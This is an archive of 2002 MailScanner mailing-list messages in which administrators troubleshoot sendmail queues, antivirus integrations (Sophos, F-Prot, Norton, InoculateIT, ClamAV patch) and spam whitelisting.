command and not "Queue runner@00:10:00". So mail isn't being sent out from /var/spool/mqueue, and I'm not sure what I am doing wrong. I'm hoping that someone may be able to shed a little light on this for me. From LISTSERV at JISCMAIL.AC.UK Thu Sep 19 13:30:56 2002 From: LISTSERV at JISCMAIL.AC.UK (L-Soft list server at JISCMAIL (1.8e)) Date: Thu Jan 12 21:15:42 2006 Subject: MAILSCANNER: james@UN.NET.AU requested to join Message-ID: <200209191230.NAA26044@magpie.ecs.soton.ac.uk> Thu, 19 Sep 2002 13:30:56 A request for subscription to the MAILSCANNER list (MailScanner mailing list) has been received from James Murchison . You can, at your discretion, send the following command to LISTSERV@JISCMAIL.AC.UK to add this person to the list: ADD MAILSCANNER james@UN.NET.AU James Murchison The simplest way to do this is to click on the following link: http://jiscmail.ac.uk/cgi-bin/wa.exe?LCMD=ADD+MAILSCANNER+james%40UN.NET.AU+James+Murchison&L=MAILSCANNER ------------------------- Original mail header -------------------------- [Request submitted through anonymous TCP/IP interface from 127.0.0.1] From LISTSERV at JISCMAIL.AC.UK Thu Sep 19 14:09:36 2002 From: LISTSERV at JISCMAIL.AC.UK (L-Soft list server at JISCMAIL (1.8e)) Date: Thu Jan 12 21:15:42 2006 Subject: MAILSCANNER: seth_kyle@ML.COM requested to join Message-ID: <200209191309.OAA00657@magpie.ecs.soton.ac.uk> Thu, 19 Sep 2002 14:09:36 A request for subscription to the MAILSCANNER list (MailScanner mailing list) has been received from Seth Kyle . You can, at your discretion, send the following command to LISTSERV@JISCMAIL.AC.UK to add this person to the list: ADD MAILSCANNER seth_kyle@ML.COM Seth Kyle The simplest way to do this is to click on the following link: http://jiscmail.ac.uk/cgi-bin/wa.exe?LCMD=ADD+MAILSCANNER+seth_kyle%40ML.COM+Seth+Kyle&L=MAILSCANNER ------------------------- Original mail header -------------------------- Return-Path: Received: from 130.246.192.52 by JISCMAIL.AC.UK (SMTPL release 1.0f) with TCP; Thu, 19 Sep 2002 14:09:36 +0100 Received: from wstutil12a.ml.com (wstutil12a-v.ml.com [209.65.19.67]) by ori.rl.ac.uk (8.11.1/8.11.1) with ESMTP id g8JD9Wr30590 for ; Thu, 19 Sep 2002 14:09:32 +0100 Received: from wstutil13a.ml.com (wstutil13a [146.125.185.11]) by wstutil12a.ml.com (8.11.3/8.11.3/wstutil12a-1.2) with ESMTP id g8JD9Vu04166 for ; Thu, 19 Sep 2002 09:09:31 -0400 (EDT) Received: from ewstwt01.exchange.ml.com (ewstwt01.exchange.ml.com [146.125.249.151]) by wstutil13a.ml.com (8.11.3/8.11.3/wstutil13a-1.1) with SMTP id g8JD9V110228 for ; Thu, 19 Sep 2002 09:09:31 -0400 (EDT) Received: from 169.242.226.175 by ewstwt01.exchange.ml.com with ESMTP ( Tumbleweed MMS SMTP Relay (MMS v4.7);); Thu, 19 Sep 2002 09:08:20 -0400 X-Server-Uuid: 3789b954-9c4e-11d3-af68-0008c73b0911 Received: by ehope08.hew.us.ml.com with Internet Mail Service ( 5.5.2654.52) id ; Thu, 19 Sep 2002 09:08:17 -0400 Message-ID: From: "Kyle, Seth (GTS)" To: "'L-Soft list server at JISCMAIL (1.8e)'" Subject: RE: Command confirmation request (76521210) Date: Thu, 19 Sep 2002 09:08:06 -0400 MIME-Version: 1.0 X-Mailer: Internet Mail Service (5.5.2654.52) X-WSS-ID: 119713CE174001-01-01 Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit From thomas_duvally at BROWN.EDU Thu Sep 19 15:26:46 2002 From: thomas_duvally at BROWN.EDU (Thomas DuVally) Date: Thu Jan 12 21:15:42 2006 Subject: sweep and Norton Message-ID: <1032445606.1634.15.camel@toms> Ok, I need help with sweep.pl. I am testing out MailScanner and Nortons Carrier Scan/Command Line Scanner. I've gotten it to work OK, but wanted to see it I could make it better. Background: Norton Carrier Scan is network based. the Command Line Scanner is a small utility to permit scanning from the command line. It just sends the file via the network and waits for a response. It has an option to tell the scanner to search a local file, and since I run the Scanner on the same system where the files are located i want to use this feature, cause its faster. Here it the question: i need to pass the absolute path to the command line scanner. I know MailScanner sends the relative path, so how can I change this? -- Tom DuVally Lead Sys. Programmer CIS, Brown University From gdr at GNO.ORG Thu Sep 19 15:27:04 2002 From: gdr at GNO.ORG (Devin Reade) Date: Thu Jan 12 21:15:42 2006 Subject: minor change for Sophos.autoupdate Message-ID: <11640000.1032445624@[192.168.50.4]> Julian, On Red Hat (and maybe other) systems, the default install creates the file /etc/cron.daily/Sophos.autoupdate. To make things cleaner for systems that don't use Sophos, would you mind adding the following line near the top of that script? [ -x /usr/local/Sophos/bin/sweep ] || exit 0 Thanks. -- Devin Reade From tyler at beloit.edu Thu Sep 19 16:01:07 2002 From: tyler at beloit.edu (Tim Tyler) Date: Thu Jan 12 21:15:42 2006 Subject: syslog not defined? In-Reply-To: <5.1.0.14.2.20020918222639.023d2d68@imap.ecs.soton.ac.uk> from "Julian Field" at Sep 18, 2002 10:27:59 PM Message-ID: <200209191501.KAA26184@beloit.edu> Julian, No, unfortunately, it is not running. I am assuming that it is crashing because of the syslog error. Is it possible it might be crashing for some other reason? Unfortunately, I am not getting anything logged to the syslog for it so I can't get a hint. Is there a debug mode to run mailscanner that might give me more information when trying to start up? Is there a trick to get it to avoid the syslog issue? This is a bit strange since 2.6 never gave me errors. Tim > >Can you check that, after it printed this error, MailScanner isn't actually >running? MailScanner now tries to start the syslogging without needing a >UDP socket open to your syslogd, but backs off and tries the old way if >that failed. So it's quite possible that this error is harmless and >MailScanner is still running after it prints this error. > >At 21:13 18/09/2002, you wrote: >>Mailscanner, >> I tried to upgrade from mailscanner 2.6 to 3.22.14 but I got this error >>when starting it up: >> >># /var/spool/mailscanner/bin/check_mailscanner >>Starting virus scanner... >>Your vendor has not defined the Sys::Syslog macro _PATH_LOG at >>/usr/local/lib/perl5/5.6.0/aix/Sys/Syslog.pm line 277. >> >>I am running AIX4.3.3. >> >>Any suggestions for resolving this? Note: I didn't get this error with 2.6. >> >>-- >>Tim Tyler >>Network Manager - Beloit College >>tyler@beloit.edu > >-- >Julian Field Teaching Systems Manager >jkf@ecs.soton.ac.uk Dept. of Electronics & Computer Science >Tel. 023 8059 2817 University of Southampton > Southampton SO17 1BJ > -- Tim Tyler Network Manager - Beloit College tyler@beloit.edu From mailscanner at ecs.soton.ac.uk Thu Sep 19 16:24:49 2002 From: mailscanner at ecs.soton.ac.uk (Julian Field) Date: Thu Jan 12 21:15:42 2006 Subject: minor change for Sophos.autoupdate In-Reply-To: <11640000.1032445624@[192.168.50.4]> Message-ID: <5.1.0.14.2.20020919162445.087f1e98@imap.ecs.soton.ac.uk> Done. At 15:27 19/09/2002, you wrote: >Julian, > >On Red Hat (and maybe other) systems, the default install >creates the file /etc/cron.daily/Sophos.autoupdate. To make >things cleaner for systems that don't use Sophos, would you >mind adding the following line near the top of that script? > > [ -x /usr/local/Sophos/bin/sweep ] || exit 0 > >Thanks. >-- > Devin Reade -- Julian Field Teaching Systems Manager jkf@ecs.soton.ac.uk Dept. of Electronics & Computer Science Tel. 023 8059 2817 University of Southampton Southampton SO17 1BJ From hciss at HCIWS.COM Thu Sep 19 17:09:59 2002 From: hciss at HCIWS.COM (Matt) Date: Thu Jan 12 21:15:42 2006 Subject: minor change for Sophos.autoupdate References: <5.1.0.14.2.20020919162445.087f1e98@imap.ecs.soton.ac.uk> Message-ID: <00b501c25ff7$043c0b80$6701a8c0@matthew> Is there an autoupdate for F-prot? > Done. > > At 15:27 19/09/2002, you wrote: > >Julian, > > > >On Red Hat (and maybe other) systems, the default install > >creates the file /etc/cron.daily/Sophos.autoupdate. To make > >things cleaner for systems that don't use Sophos, would you > >mind adding the following line near the top of that script? > > > > [ -x /usr/local/Sophos/bin/sweep ] || exit 0 From mailscanner at ecs.soton.ac.uk Thu Sep 19 17:24:51 2002 From: mailscanner at ecs.soton.ac.uk (Julian Field) Date: Thu Jan 12 21:15:42 2006 Subject: minor change for Sophos.autoupdate In-Reply-To: <00b501c25ff7$043c0b80$6701a8c0@matthew> References: <5.1.0.14.2.20020919162445.087f1e98@imap.ecs.soton.ac.uk> Message-ID: <5.1.0.14.2.20020919172429.087e9d00@imap.ecs.soton.ac.uk> At 17:09 19/09/2002, you wrote: >Is there an autoupdate for F-prot? Yes, it comes in /usr/local/f-prot/autoupdate unless I'm very much mistaken... > > Done. > > > > At 15:27 19/09/2002, you wrote: > > >Julian, > > > > > >On Red Hat (and maybe other) systems, the default install > > >creates the file /etc/cron.daily/Sophos.autoupdate. To make > > >things cleaner for systems that don't use Sophos, would you > > >mind adding the following line near the top of that script? > > > > > > [ -x /usr/local/Sophos/bin/sweep ] || exit 0 -- Julian Field Teaching Systems Manager jkf@ecs.soton.ac.uk Dept. of Electronics & Computer Science Tel. 023 8059 2817 University of Southampton Southampton SO17 1BJ From sevans at FOUNDATION.SDSU.EDU Thu Sep 19 17:33:57 2002 From: sevans at FOUNDATION.SDSU.EDU (Steve Evans) Date: Thu Jan 12 21:15:42 2006 Subject: Sendmail Log Analyzer Message-ID: <6214C3F9233D764C9E7029396C3550153314CF@mail.foundation.sdsu.edu> I know this was discussed in the last couple of months but I can't find it in the archives. I need to analyze my sendmail logs. Could someone point me in the direction of some good tools for that (preferably free ones.) Thanks. Steve Evans (619) 594-0653 From LISTSERV at JISCMAIL.AC.UK Thu Sep 19 17:38:53 2002 From: LISTSERV at JISCMAIL.AC.UK (L-Soft list server at JISCMAIL (1.8e)) Date: Thu Jan 12 21:15:42 2006 Subject: MAILSCANNER: george.soley@INTRATECHINC.COM left the list Message-ID: <200209191638.RAA28841@magpie.ecs.soton.ac.uk> Thu, 19 Sep 2002 17:38:53 George Soley has just signed off the MAILSCANNER list (MailScanner mailing list). ------------------------- Original mail header -------------------------- Return-Path: Received: from 130.246.192.52 by JISCMAIL.AC.UK (SMTPL release 1.0f) with TCP; Thu, 19 Sep 2002 17:38:52 +0100 Received: from iquest2.iquest.net (iquest2.iquest.net [206.246.180.13]) by ori.rl.ac.uk (8.11.1/8.11.1) with SMTP id g8JGcor25541 for ; Thu, 19 Sep 2002 17:38:50 +0100 Received: (qmail 9183 invoked from network); 19 Sep 2002 16:38:44 -0000 Received: from iquest3.iquest.net (206.246.180.23) by iquest2.iquest.net with SMTP; 19 Sep 2002 16:38:44 -0000 Received: (qmail 12778 invoked from network); 19 Sep 2002 16:38:43 -0000 Received: from dial-53-201-11-05.ind.iquest.net (HELO intratechinc.com) (209.43.106.53) by iquest3.iquest.net with SMTP; 19 Sep 2002 16:38:43 -0000 Received: from gas ([172.24.1.142]) (authenticated bits=0) by intratechinc.com (8.12.1/8.12.1) with ESMTP id g8JGeLuY006601 (version=TLSv1/SSLv3 cipher=RC4-MD5 bits=128 verify=NO) for ; Thu, 19 Sep 2002 11:40:21 -0500 Message-ID: <003601c25ffb$41e9b320$8e0118ac@gas> Reply-To: "George Soley" From: "George Soley" To: "L-Soft list server at JISCMAIL \(1.8e\)" References: <200209191611.g8JGBEuX006347@intratechinc.com> Subject: Re: Command confirmation request (A62C7C6A) Date: Thu, 19 Sep 2002 11:40:25 -0500 Organization: IntraTech Technical Services MIME-Version: 1.0 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: 7bit X-Priority: 3 X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook Express 6.00.2600.0000 X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2600.0000 X-MailScanner: Found to be clean From hciss at HCIWS.COM Thu Sep 19 17:45:17 2002 From: hciss at HCIWS.COM (Matt) Date: Thu Jan 12 21:15:42 2006 Subject: minor change for Sophos.autoupdate References: <5.1.0.14.2.20020919162445.087f1e98@imap.ecs.soton.ac.uk> <5.1.0.14.2.20020919172429.087e9d00@imap.ecs.soton.ac.uk> Message-ID: <00d501c25ffb$f2491120$6701a8c0@matthew> > >Is there an autoupdate for F-prot? > > Yes, it comes in /usr/local/f-prot/autoupdate unless I'm very much mistaken... It looks to me like it only updates the application and not the signatures. Matt From john at sme-ecom.co.uk Thu Sep 19 17:56:35 2002 From: john at sme-ecom.co.uk (John Walker) Date: Thu Jan 12 21:15:42 2006 Subject: Email Signature Message-ID: <000001c25ffd$8a1b3a40$0200000a@mail> Hi all, As a relative newbie to Mailscanner this question I think may have already been answered but...... Are there any moves a foot to have MS provide an unique editable signature by domain. Apologies in advance if this is an oldie. Regards John Walker Sme-Ecom From fizz at BOMB.NET Thu Sep 19 18:00:19 2002 From: fizz at BOMB.NET (Kelly Hamlin) Date: Thu Jan 12 21:15:42 2006 Subject: strange one for ya... Message-ID: <000001c25ffe$08c56000$483cd842@fizz> I just received a message with no "to" no "from" no "subject" no "sent date or time" and it cannot be deleted, replied to or forwarded (it says invalid e-mail address when you try). I received a similar message a week or two ago and it's still sitting here without being able to delete. Anything you can do to stop messages like that? And any suggestions to remove the message? ////// ( o o ) +--.oooO--(_)--Oooo.-----------------+ | [Kelly Hamlin] | support@cyberstreet.com | http://www.cyberstreet.com | .oooO | ( ) Oooo. +--- (----( )----------------------------+ \_) ) / (_/ -------------- next part -------------- An HTML attachment was scrubbed... URL: http://lists.mailscanner.info/pipermail/mailscanner/attachments/20020919/f80d14cb/attachment.html From email at ace.net.au Thu Sep 19 19:33:02 2002 From: email at ace.net.au (Peter Nitschke) Date: Thu Jan 12 21:15:42 2006 Subject: minor change for Sophos.autoupdate In-Reply-To: <5.1.0.14.2.20020919172429.087e9d00@imap.ecs.soton.ac.uk> References: <5.1.0.14.2.20020919162445.087f1e98@imap.ecs.soton.ac.uk> <5.1.0.14.2.20020919172429.087e9d00@imap.ecs.soton.ac.uk> Message-ID: <200209200403020493.1AC258B3@smtp1.ace.net.au> What is the difference between running that and check-updates.sh ? Peter *********** REPLY SEPARATOR *********** On 19/09/2002 at 5:24 PM Julian Field wrote: >At 17:09 19/09/2002, you wrote: >>Is there an autoupdate for F-prot? > >Yes, it comes in /usr/local/f-prot/autoupdate unless I'm very much >mistaken... > > From adrian at SMOP.CO.UK Thu Sep 19 19:50:20 2002 From: adrian at SMOP.CO.UK (Adrian Bridgett) Date: Thu Jan 12 21:15:42 2006 Subject: clamav support for mailscanner (patch) Message-ID: <20020919185020.GA2818@wyvern.smop.co.uk> Here's a basic parser for clamav (clamav.elektrapro.com). I've unit tested it with zip archives only (no rar archives etc). Maybe "TryOneCommercial" should be renamed ;-) I havn't actually started using mailscanner yet (I'm about to swap from amavisd-new having seen the source code ), so this is definitely not tested in production. Hope this is useful for someone - patch attached is against 3.22.13-1 (debian package), but should apply pretty cleanly (the diff against 3.13 just failed on one offset). I must say, I'm not a great fan of the InitParser/ProcessOutput stuff - any particular reason why it was done this way (calling it a line at a time - you could pass it a file desciptor)? Adrian Email: adrian@smop.co.uk Windows NT - Unix in beta-testing. GPG/PGP keys available on public key servers Debian GNU/Linux -*- By professionals for professionals -*- www.debian.org -------------- next part -------------- diff -ru 3.22.orig/etc/mailscanner/mailscanner.conf 3.22/etc/mailscanner/mailscanner.conf --- 3.22.orig/etc/mailscanner/mailscanner.conf 2002-09-11 23:51:48.000000000 +0100 +++ 3.22/etc/mailscanner/mailscanner.conf 2002-09-18 22:22:37.000000000 +0100 @@ -119,6 +119,7 @@ # panda from www.pandasoftware.com, or # rav from www.ravantivirus.com, or # antivir from www.antivir.de, or +# clamav from clamav.elektrapro.com or # none # # Note: If you want to use multiple virus scanners, then this should be a Only in 3.22/etc/mailscanner: mailscanner.conf~ Only in 3.22/etc/mailscanner/wrapper: clamavwrapper diff -ru 3.22.orig/usr/share/mailscanner/sweep.pl 3.22/usr/share/mailscanner/sweep.pl --- 3.22.orig/usr/share/mailscanner/sweep.pl 2002-09-10 09:01:02.000000000 +0100 +++ 3.22/usr/share/mailscanner/sweep.pl 2002-09-18 22:21:41.000000000 +0100 @@ -173,6 +173,16 @@ SupportScanning => $S_UNSUPPORTED, SupportDisinfect => $S_UNSUPPORTED, }, + clamav => { + Lock => 'ClamAV.lock', + CommonOptions => '-r --disable-summary --stdout', + DisinfectOptions => '', + ScanOptions => '', + InitParser => \&InitClamAVParser, + ProcessOutput => \&ProcessClamAVOutput, + SupportScanning => $S_BETA, + SupportDisinfect => $S_NONE, + }, "none" => { Lock => 'NoneBusy.lock', CommonOptions => '', @@ -507,6 +517,13 @@ ; } +# Initialise any state variables the ClamAV output parser uses +my ($clamav_archive); +sub InitClamAVParser { + $clamav_archive = ""; +} + + # These functions must be called with, in order: # * The line of output from the scanner # * A reference to the hash containing problem details @@ -1022,6 +1039,63 @@ return 0; } +# Process ClamAV (v0.22) output +sub ProcessClamAVOutput { + my($line, $infections, $types, $BaseDir) = @_; + + if ($line =~ /^ERROR:/ or $line =~ /^execv\(p\):/) + { + chomp $line; + Log::WarnLog($line); + return 0; + } + + # clamscan currently stops as soon as one virus is found + # therefore there is little point saying which part + # it's still a start mind! + + # Only tested with --unzip since only windows boxes get viruses ;-) + + if (/^Archive: (.*)$/) + { + $clamav_archive = $1; + return 0; + } + return 0 if /^ /; # " inflating", " deflating.." from --unzip + if ($clamav_archive && /^$clamav_archive:/) + { + $clamav_archive = ""; + return 0; + } + + return 0 if /OK$/; + + if (/^(.*?): (.*) FOUND$/) + { + my ($id, $part, $virus); + $virus = $2; + if ($clamav_archive) + { + $id = $clamav_archive; + ($part = $1) =~ s/^.*\///; # get basename of file + } + else + { + $id = $1; + $part = ""; + } + $id =~ s/$BaseDir\///; + + $infections->{"$id"}{"$part"} .= "contains $virus\n"; + $types->{"$id"}{"$part"} .= "v"; + return 1; + } + + chomp $line; + Log::WarnLog("ProcessClamAVOutput: unrecognised line \"$line\""); + return 0; +} + sub CallOwnChecking { my($BaseDir, $mime, $infections, $inftypes) = @_; From thomas_duvally at BROWN.EDU Thu Sep 19 21:06:27 2002 From: thomas_duvally at BROWN.EDU (Thomas DuVally) Date: Thu Jan 12 21:15:42 2006 Subject: sweep and Norton In-Reply-To: <1032445606.1634.15.camel@toms> References: <1032445606.1634.15.camel@toms> Message-ID: <1032465987.2200.26.camel@toms> I was able to figure this out myself, but I had to modify sweep.pl in such a way that it's now likely incompatible with any other scanner. Nick/Julian, should I send you the diffs and some samples outputs? I'm maybe the 2nd person to request support for Norton, so there isn't a huge demand. On Thu, 2002-09-19 at 10:26, Thomas DuVally wrote: > Ok, I need help with sweep.pl. > > I am testing out MailScanner and Nortons Carrier Scan/Command Line > Scanner. I've gotten it to work OK, but wanted to see it I could make > it better. > > Background: Norton Carrier Scan is network based. the Command Line > Scanner is a small utility to permit scanning from the command line. It > just sends the file via the network and waits for a response. > It has an option to tell the scanner to search a local file, and since > I run the Scanner on the same system where the files are located i want > to use this feature, cause its faster. > > Here it the question: i need to pass the absolute path to the command > line scanner. I know MailScanner sends the relative path, so how can I > change this? > > > -- > Tom DuVally > Lead Sys. Programmer > CIS, Brown University -- Tom DuVally Lead Sys. Programmer CIS, Brown University p 401-863-9466 From munafo at PREZZEMOLO.POLITO.IT Thu Sep 19 21:58:27 2002 From: munafo at PREZZEMOLO.POLITO.IT (Maurizio Matteo Munafo') Date: Thu Jan 12 21:15:42 2006 Subject: minor change for Sophos.autoupdate In-Reply-To: <00fb01c26006$04e0b220$6701a8c0@matthew> from "Matt" at Sep 19, 2002 12:57:23 PM Message-ID: <200209192058.g8JKwR126469@mail.tlc.polito.it> Matt wrote: > > > At 17:09 19/09/2002, you wrote: > > >Is there an autoupdate for F-prot? > > > > Yes, it comes in /usr/local/f-prot/autoupdate unless I'm very much > mistaken... > > What does this mean? > > [root f-prot]# perl autoupdate > FTP address for retrieving files is ftp://eu-3.updates.f-prot.com/pub/ > Unknown fatal error calling "checksum", exiting., Bad file descriptor at > autoupd > ate line 294, chunk 2. > A possible cause is a wrong path for the F-Prot directory in the autoupdate script. I had the same problem last week, since I forgot to correct the scripts after the latest RPM installation. M. -- ______ / Maurizio M. Munafo' / dMMMMMMMMb dMMMMb / Dip. di Elettronica - Politecnico di Torino / dMP"dMP"dMP "dMP / Corso Duca degli Abruzzi 24 / dMP dMP dMP dMMK" / I-10129 Torino (Italia) / dMP dMP dMP dMF / Tel: +39 011 5644128 Fax: +39 011 5644099 / dMP dMP dMP dMMMMP" / E-mail: munafo@polito.it /__________________________ From billa at STERLING.NET Thu Sep 19 22:55:09 2002 From: billa at STERLING.NET (Bill Anderson) Date: Thu Jan 12 21:15:42 2006 Subject: White list ip's? Message-ID: Can I white list IP addresses so they do not get marked as spam? I need to whitelist my own mail servers via ip address. I can't whitelist via domain names since some of the spammers send mail with my domains in the from address. Thanks. ======================= Sterling Support (503)885-8908 x223 support@sterling.net http://www.sterling.net ======================= For network status and outage information, please see: http://www.sterling.net/support_networkstatus.asp From billa at STERLING.NET Thu Sep 19 23:05:16 2002 From: billa at STERLING.NET (Bill Anderson) Date: Thu Jan 12 21:15:42 2006 Subject: White list ip's? In-Reply-To: Message-ID: Sorry, I found it.... /usr/local/mailscanner.conf Accept Spam From = "IP Address" > -----Original Message----- > From: MailScanner mailing list [mailto:MAILSCANNER@JISCMAIL.AC.UK]On > Behalf Of Bill Anderson > Sent: Thursday, September 19, 2002 2:55 PM > To: MAILSCANNER@JISCMAIL.AC.UK > Subject: White list ip's? > > > Can I white list IP addresses so they do not get marked as spam? > I need to > whitelist my own mail servers via ip address. I can't whitelist > via domain > names since some of the spammers send mail with my domains in the from > address. Thanks. > > ======================= > Sterling Support > (503)885-8908 x223 > support@sterling.net > http://www.sterling.net > ======================= > > For network status and outage information, please see: > http://www.sterling.net/support_networkstatus.asp > From mkettler at EVI-INC.COM Thu Sep 19 23:28:53 2002 From: mkettler at EVI-INC.COM (Matt Kettler) Date: Thu Jan 12 21:15:42 2006 Subject: problem with queue runner In-Reply-To: <000601c25fd5$3a245e90$5d751542@billslaptop> Message-ID: <5.1.1.6.0.20020919182058.01c37a50@192.168.50.2> For test and debug, I'd recommend using -q1m instead of 15.. This way the queue gets cranked more often while you're testing.. As far as the two entries in ps.. could you be a bit more specific? Can you tell us how you're starting sendmail? What parameters are passed to each sendmail? Your asking a very broad question and providing very little information about your configuration, other than "I'm running sendmail -q15m" and "mail isn't being delivered from mqueue". you should see something like this: # ps ax |grep sendmail xxxxx ? S 0:08 sendmail: accepting connections xxxxx ? S 0:00 /usr/sbin/sendmail -q5m xxxxx ? S 0:00 sendmail: server listman.redhat.com [66.187.233.211] xxxxx ? S 0:00 sendmail: server usw-sf-fw2.sourceforge.net [216.136. (note: PID's munged to xxxxx) So i have one inbound, accepting SMTP, one que-processing, and two that are handling communications with an external server at the moment. (the number of extra ones will vary from moment to moment). Note that the first sendmail is started with: /usr/sbin/sendmail -bd -ODeliveryMode=queueonly -OQueueDirectory=/var/spool/mqueue.in and the other is started with: /usr/sbin/sendmail -q5m At 07:08 AM 9/19/2002 -0500, Bill Omer wrote: >I'm running sendmail -q15m, and when I do a ps afx | grep sendmail, I >see a 2nd sendmail process, but it only shows the command and not "Queue >runner@00:10:00". So mail isn't being sent out from /var/spool/mqueue, >and I'm not sure what I am doing wrong. I'm hoping that someone may be >able to shed a little light on this for me. From hciss at HCIWS.COM Fri Sep 20 00:09:34 2002 From: hciss at HCIWS.COM (Matt) Date: Thu Jan 12 21:15:42 2006 Subject: Spam Tagging Suggestion Message-ID: <002101c26031$a1665f20$6701a8c0@matthew> I have an idea for spam scanning with Spamassassin. Have a setting so it adds a tag to the end of the message if its has over so many hits. Then have the tag relate how many hits. If 5(or whatever set at) hits or more its tagged like so: -- MailScanner Scanned SpamAssassin - - - - - 5 hits. If 12 hits its tagged like so: -- MailScanner Scanned SpamAssassin - - - - - - - - - - - - 12 hits. This way users can setup a rule in Outlook to there liking. If they want aggressive filtering they can add a rule that if the Body Contains "SpamAssassin - - - - -" move to "Junk Mail" folder. That 5 hit rule will also work on anything over 5 hits. If the signature is added to the text portion of the message and its in html they won't even see it but the Outlook rules should. They can also add another rule if Body Contains "SpamAssassin - - - - - - - - - - - -" move to "Trash". Hopefully users could ignore the tags at the end if they did not like them. Its really a shame Outlook cannot look at the headers for mail rules. Matthew H From james at un.net.au Fri Sep 20 00:16:44 2002 From: james at un.net.au (James Murchison) Date: Thu Jan 12 21:15:42 2006 Subject: InoculateIT and Mailscanner Message-ID: <000701c26032$9f8c7990$6401a8c0@jamesdesktop> Julian, I have been running Mailscanner for 12 Months on RedHat 7.0 with InoculateIT no problems. Recently we introduced a new mail server, Redhat 7.3 and InoculteIT 6.0. I have the latest version (3.22-14) of Mailscanner installed. I am having an issue with INO6.0, it comes up with a libarclib shared library problem when the sweep is run. I have visted the mailing lists and seen there are numerous people who have addressed this problem with AMVIS (InoculateIT will not accept anything, but the root user). I have tried to adapt to Mailscanner with no success. The thing that has me stuffed is why it works on 7.0 and not 7.3. I made no special mods to make the original install work. I have checked on the WEB and I beleive that Mailscanner is the best dam MVS around. I am convinced there must be a way to make this work..... I tried using the sudo command, this seems to have no effect at all. What user does the sweep command use? can you help ?? Kind Regards, James Murchison Unlimited Networks web : www.un.net.au From james at UN.NET.AU Fri Sep 20 00:18:58 2002 From: james at UN.NET.AU (James Murchison) Date: Thu Jan 12 21:15:42 2006 Subject: InoculateIT 6.0 & Mailscanner Message-ID: <200209192318.g8JNIxr04000@ori.rl.ac.uk> Julian, I have been running Mailscanner for 12 Months on RedHat 7.0 with InoculateIT no problems. Recently we introduced a new mail server, Redhat 7.3 and InoculteIT 6.0. I have the latest version (3.22-14) of Mailscanner installed. I am having an issue with INO6.0, it comes up with a libarclib shared library problem when the command line sweep is run. I have visted the mailing lists and seen there are numerous people who have addressed this problem with AMVIS (InoculateIT will not accept anything, but the root user). I have tried to adapt to Mailscanner with no success. The thing that has me stuffed is why it works on 7.0 and not 7.3. I made no special mods to make the original install work. I have checked on the WEB and I beleive that Mailscanner is the best dam MVS around. I am convinced there must be a way to make this work..... I tried using the sudo command, this seems to have no effect at all. What user does the sweep command use? can you help ?? Kind Regards, James. From smohan at VSNL.COM Fri Sep 20 03:23:02 2002 From: smohan at VSNL.COM (S Mohan) Date: Thu Jan 12 21:15:42 2006 Subject: Sendmail Log Analyzer In-Reply-To: <6214C3F9233D764C9E7029396C3550153314CF@mail.foundation.sdsu.edu> Message-ID: <006101c2604c$a6a1fc90$01000001@mohans> Try the following. Anteater http://anteater.drzoom.ch/, mreport - try google for download page,. I think we cang et mreport from sourceforge. Not sure. Mohan -----Original Message----- From: MailScanner mailing list [mailto:MAILSCANNER@JISCMAIL.AC.UK] On Behalf Of Steve Evans Sent: Thursday, September 19, 2002 10:04 PM To: MAILSCANNER@JISCMAIL.AC.UK Subject: Sendmail Log Analyzer I know this was discussed in the last couple of months but I can't find it in the archives. I need to analyze my sendmail logs. Could someone point me in the direction of some good tools for that (preferably free ones.) Thanks. Steve Evans (619) 594-0653 From sevans at FOUNDATION.SDSU.EDU Fri Sep 20 05:30:55 2002 From: sevans at FOUNDATION.SDSU.EDU (Steve Evans) Date: Thu Jan 12 21:15:42 2006 Subject: DOS Attack on Mail Server Message-ID: <6214C3F9233D764C9E7029396C355015116B1A@mail.foundation.sdsu.edu> We received about 15,000 messages in about 30 minutes today from a single source. It turned out to a bug in a website that sent us message after message after message. I was able to quickly find the source IP and block it at the firewall but this could have been very bad. It took me about 20 minutes to realize mail wasn't flowing, and by the time I logged into the Sendmail gateway, and checked the number of files in mqueue.in it was somewhere in the 25,000 range. If my cell phone service was off (I got a page on my cell phone because of the large queue) it wouldn't have stopped until the users mailbox was full and started bouncing message. (she was at about 10 mb's of 250. They were 5kb messages I believe so (check my math) it would have taken, 50,000 messages to fill her up. Anyways, my point. Could mailscanner somehow detect this and stop sendmail from accepting the messages. I'm not sure if it's practical. Maybe if it breaks a certain number of messages in 10 minutes overall, by from or to address, from IP, or similar messages. Any thoughts? Steve Evans (619) 594-0653 From bovati at MONDADORI.COM Fri Sep 20 07:44:29 2002 From: bovati at MONDADORI.COM (Mirko Bovati) Date: Thu Jan 12 21:15:42 2006 Subject: Mailscanner & blank space Message-ID: <200209200644.g8K6iWr17454@ori.rl.ac.uk> Hi all, I found that if the mailserver of mine receives an attach named with a name beginning with a space (" test.doc") containing a virus, mailscanner die with the error: read-open test.doc: No such file or directory at /usr/lib/perl5/site_perl/5.6.1/MIME/Body.pm line 417 I set up e a second installation to test this odd behaviour with the same result. Could someone of you do the same test i.e. see the behaviour of mailscanner receiving an attach like the above? My be I'm very unlucky installing it? Many thanks, Mirko Bovati From james at un.net.au Fri Sep 20 08:56:48 2002 From: james at un.net.au (James Murchison) Date: Thu Jan 12 21:15:42 2006 Subject: InoculateIT and Mailscanner In-Reply-To: <20020920071430.GD6315@hoiho.nz.lemon-computing.com> Message-ID: <000201c2607b$45ee6350$6401a8c0@jamesdesktop> Nick, Firstly thanks for taking an interest in my problem. I think if I can get Mailscanner to run as root, this will fix my problem. Any hints you know of?? See below for other answers. On Fri, Sep 20, 2002 at 09:16:44AM +1000, James Murchison wrote: > I have been running Mailscanner for 12 Months on RedHat 7.0 with > InoculateIT no problems. Recently we introduced a new mail server, > Redhat 7.3 and InoculteIT 6.0. I have the latest version (3.22-14) of > Mailscanner installed. I am having an issue with INO6.0, it comes up > with a libarclib shared library problem when the sweep is run. What's the exact problem/error message/output? The exact error is : error in loading shared libraries: libarclib.so: cannot open shared object file: No Such file or directory I was able to duplicate this error by logging in as a non root user. Then running the command (inocmd32). As soon as I logged in as root the problem goes away. The exact problem is : When the virus scanner is invoked it returns the above error, then proceeds to continue processing without scanning for viruses. > I have visted the mailing lists and seen there are numerous people who > have addressed this problem with AMVIS (InoculateIT will not accept > anything, but the root user). I have tried to adapt to Mailscanner > with no success. You mean Inoculate won't run *at all* unless it's root? By design? Or just by accident? By design.... CA have advised this will not change. [JM] What use are you running mailscanner as? I use Mailscanner to prescan multiple email domains for viruses and 